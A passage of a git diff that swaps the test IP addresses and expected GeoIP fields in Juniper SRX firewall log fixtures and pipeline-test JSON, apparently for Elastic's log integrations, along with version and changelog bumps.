name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", "category": [ @@ -831,29 +741,26 @@ { "server": { "port": 443, - "ip": "216.160.83.61" + "ip": "67.43.156.14" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 443, - "ip": "216.160.83.61" + "ip": "67.43.156.14" }, "source": { "port": 58974, @@ -898,7 +805,7 @@ ], "ip": [ "10.1.1.100", - "216.160.83.61" + "67.43.156.14" ] }, "client": { @@ -907,8 +814,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:35.371223503Z", - "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"58974\" destination-address=\"216.160.83.61\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", + "ingested": "2021-12-10T10:14:14.639547300Z", + "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"58974\" destination-address=\"67.43.156.14\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", "risk_score": 0.0, "kind": "event", "category": [ @@ -924,29 +831,26 @@ { "server": { "port": 443, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 443, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "source": { "port": 59075, @@ -991,7 +895,7 @@ ], "ip": [ "10.1.1.100", - "216.160.83.61" + "67.43.156.13" ] }, "client": { @@ -1000,8 +904,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371225036Z", - "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"59075\" destination-address=\"216.160.83.61\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", + "ingested": "2021-12-10T10:14:14.639552100Z", + "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"59075\" destination-address=\"67.43.156.13\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", "risk_score": 3.0, "kind": "alert", "action": "web_filter", @@ -1020,39 +924,30 @@ { "server": { "port": 58954, - "ip": "216.160.83.61" + "ip": "10.1.1.100" }, "log": { "level": "warning" }, "destination": { + "port": 58954, + "ip": "10.1.1.100" + }, + "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, - "port": 58954, - "ip": "216.160.83.61" - }, - "source": { "port": 80, - "as": { - "number": 35994, - "organization": { - "name": "Akamai Technologies, Inc." - } - }, - "ip": "23.209.86.45" + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -1088,18 +983,18 @@ }, "related": { "ip": [ - "23.209.86.45", - "216.160.83.61" + "67.43.156.13", + "10.1.1.100" ] }, "client": { "port": 80, - "ip": "23.209.86.45" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371226809Z", - "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"23.209.86.45\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639558300Z", + "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", "kind": "event", "category": [ "network" diff --git a/packages/juniper/manifest.yml b/packages/juniper/manifest.yml index 06c9b2577bf..aeb4b4f0c3d 100644 --- a/packages/juniper/manifest.yml +++ b/packages/juniper/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: juniper title: Juniper Logs -version: 1.0.5 +version: 1.0.6 description: Deprecated. Use a specific Juniper package instead. categories: ["network", "security"] release: ga diff --git a/packages/juniper_srx/_dev/deploy/docker/sample_logs/juniper-srx.log b/packages/juniper_srx/_dev/deploy/docker/sample_logs/juniper-srx.log index 38c11bb4104..253d25cb005 100644 --- a/packages/juniper_srx/_dev/deploy/docker/sample_logs/juniper-srx.log +++ b/packages/juniper_srx/_dev/deploy/docker/sample_logs/juniper-srx.log @@ -1,2 +1,2 @@ -<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="216.160.83.57" source-port="58071" destination-address="89.160.20.112" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] -<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="216.160.83.57" source-port="594" destination-address="89.160.20.112" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="67.43.156.12" nat-source-port="594" nat-destination-address="67.43.156.14" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] +<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.0.0.1" source-port="594" destination-address="10.128.0.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="10.128.0.1" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] diff --git a/packages/juniper_srx/changelog.yml b/packages/juniper_srx/changelog.yml index 93f1dfd6a78..1ff5f3f11e9 100644 --- a/packages/juniper_srx/changelog.yml +++ b/packages/juniper_srx/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.0" changes: - description: Initial release of new package split from oroginal Juniper package diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log index 168c3dd9843..fb82adabaf4 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log @@ -1,4 +1,4 @@ -<14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="175.16.199.1" source-port="57116" destination-address="216.160.83.57" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"] -<14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="1.128.3.4" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"] -<11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="1.128.3.4" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"] -<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="175.16.199.1" source-port="60148" destination-address="216.160.83.57" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"] +<14>1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host="www.mytest.com" file-category="executable" action="BLOCK" verdict-number="8" verdict-source=”cloud/blacklist/whitelist” source-address="10.10.10.1" source-port="57116" destination-address="67.43.156.15" destination-port="80" protocol-id="6" application="UNKNOWN" nested-application="UNKNOWN" policy-name="argon_policy" username="user1" session-id-32="50000002" source-zone-name="untrust" destination-zone-name="trust"] +<14>1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" sample-sha256="ABC123" client-ip="192.168.2.0" verdict-number="9" malware-info="Eicar:TestVirus" username="admin" hostname="host.example.com"] +<11>1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp="Thu Jun 23 09:55:38 2016" tenant-id="ABC123456" client-ip="192.168.2.0" hostname="host.example.com" status="in_progress" policy-name="default" th="7" state="added" reason="malware" message="malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123"] +<165>1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname="dummy_host" file-category="executable" verdict-number="10" malware-info="Testfile" action="PERMIT" list-hit="N/A" file-hash-lookup="FALSE" source-address="67.43.156.15" source-port="60148" destination-address="67.43.156.15" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" policy-name="test-policy" username="N/A" roles="N/A" session-id-32="502156" source-zone-name="Inside" destination-zone-name="Outside" sample-sha256="e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494" file-name="dummy_file" url="dummy_url"] diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log-expected.json index ee215f5e8bd..eb3bdb662ce 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-atp.log-expected.json @@ -3,48 +3,33 @@ { "server": { "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", - "location": { - "lon": 125.3228, - "lat": 43.88 - } - }, "port": 57116, "user": { "name": "user1" }, - "ip": "175.16.199.1" + "ip": "10.10.10.1" }, "juniper": { "srx": { @@ -91,18 +76,18 @@ "www.mytest.com" ], "ip": [ - "175.16.199.1", - "216.160.83.57" + "10.10.10.1", + "67.43.156.15" ] }, "client": { "port": 57116, - "ip": "175.16.199.1" + "ip": "10.10.10.1" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:15.401067633Z", - "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"175.16.199.1\" source-port=\"57116\" destination-address=\"216.160.83.57\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]", + "ingested": "2021-12-10T10:15:56.414273600Z", + "original": "\u003c14\u003e1 2013-12-14T16:06:59.134Z pinarello RT_AAMW - SRX_AAMW_ACTION_LOG [junos@xxx.x.x.x.x.28 http-host=\"www.mytest.com\" file-category=\"executable\" action=\"BLOCK\" verdict-number=\"8\" verdict-source=”cloud/blacklist/whitelist” source-address=\"10.10.10.1\" source-port=\"57116\" destination-address=\"67.43.156.15\" destination-port=\"80\" protocol-id=\"6\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" policy-name=\"argon_policy\" username=\"user1\" session-id-32=\"50000002\" source-zone-name=\"untrust\" destination-zone-name=\"trust\"]", "kind": "alert", "action": "malware_detected", "category": [ @@ -136,24 +121,18 @@ "host.example.com" ], "ip": [ - "1.128.3.4" + "192.168.2.0" ] }, "log": { "level": "informational" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "user": { "name": "admin" }, "domain": "host.example.com", - "ip": "1.128.3.4" + "ip": "192.168.2.0" }, "juniper": { "srx": { @@ -168,8 +147,8 @@ }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:15.401090205Z", - "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"1.128.3.4\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]", + "ingested": "2021-12-10T10:15:56.414284200Z", + "original": "\u003c14\u003e1 2016-09-20T10:43:30.330-07:00 host-example RT_AAMW - AAMW_MALWARE_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" sample-sha256=\"ABC123\" client-ip=\"192.168.2.0\" verdict-number=\"9\" malware-info=\"Eicar:TestVirus\" username=\"admin\" hostname=\"host.example.com\"]", "kind": "alert", "action": "malware_detected", "category": [ @@ -203,21 +182,15 @@ "host.example.com" ], "ip": [ - "1.128.3.4" + "192.168.2.0" ] }, "log": { "level": "error" }, "source": { - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, "domain": "host.example.com", - "ip": "1.128.3.4" + "ip": "192.168.2.0" }, "juniper": { "srx": { @@ -235,8 +208,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:15.401096838Z", - "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"1.128.3.4\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]", + "ingested": "2021-12-10T10:15:56.414290700Z", + "original": "\u003c11\u003e1 2016-09-20T10:40:30.050-07:00 host-example RT_AAMW - AAMW_HOST_INFECTED_EVENT_LOG [junos@xxxx.1.1.x.x.xxx timestamp=\"Thu Jun 23 09:55:38 2016\" tenant-id=\"ABC123456\" client-ip=\"192.168.2.0\" hostname=\"host.example.com\" status=\"in_progress\" policy-name=\"default\" th=\"7\" state=\"added\" reason=\"malware\" message=\"malware analysis detected host downloaded a malicious_file with score 9, sha256 ABC123\"]", "kind": "alert", "category": [ "network", @@ -255,45 +228,42 @@ { "server": { "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "log": { "level": "notification" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 60148, - "ip": "175.16.199.1", + "ip": "67.43.156.15", "domain": "dummy_host" }, "juniper": { @@ -340,18 +310,17 @@ "dummy_host" ], "ip": [ - "175.16.199.1", - "216.160.83.57" + "67.43.156.15" ] }, "client": { "port": 60148, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "event": { "severity": 165, - "ingested": "2021-11-25T09:37:15.401101486Z", - "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@2636.1.1.1.2.129 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"175.16.199.1\" source-port=\"60148\" destination-address=\"216.160.83.57\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]", + "ingested": "2021-12-10T10:15:56.414297Z", + "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z aamw1 RT_AAMW - AAMW_ACTION_LOG [junos@67.43.156.15 hostname=\"dummy_host\" file-category=\"executable\" verdict-number=\"10\" malware-info=\"Testfile\" action=\"PERMIT\" list-hit=\"N/A\" file-hash-lookup=\"FALSE\" source-address=\"67.43.156.15\" source-port=\"60148\" destination-address=\"67.43.156.15\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" policy-name=\"test-policy\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502156\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" sample-sha256=\"e038b5168d9209267058112d845341cae83d92b1d1af0a10b66830acb7529494\" file-name=\"dummy_file\" url=\"dummy_url\"]", "kind": "event", "category": [ "network" diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log index f40b307944c..362c16b63f3 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log @@ -1,25 +1,25 @@ -<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address="216.160.83.57" source-port="594" destination-address="175.16.199.1" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="594" nat-destination-address="216.160.83.57" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address="216.160.83.57" source-port="37233" destination-address="175.16.199.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address="216.160.83.57" source-port="56639" destination-address="175.16.199.1" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "] -<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason="unset" source-address="216.160.83.57" source-port="63456" destination-address="175.16.199.1" destination-port="902" service-name="None" nat-source-address="175.16.199.1" nat-source-port="63456" nat-destination-address="5.6.7.8" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] -<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address="216.160.83.57" source-port="24065" destination-address="175.16.199.1" destination-port="768" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address="216.160.83.57" source-port="1" destination-address="175.16.199.1" destination-port="46384" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packet-incoming-interface="ge-0/0/1.0"] -<14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason="response received" source-address="216.160.83.57" source-port="1" destination-address="175.16.199.1" destination-port="46384" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="1" nat-destination-address="18.51.100.12" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] -<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP FIN" source-address="216.160.83.57" source-port="47776" destination-address="175.16.199.1" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="175.16.199.1" nat-source-port="19162" nat-destination-address="8.23.224.110" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] -<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason="TCP RST" source-address="216.160.83.57" source-port="53232" destination-address="175.16.199.1" destination-port="445" service-name="junos-smb" nat-source-address="175.16.199.1" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] -<14>1 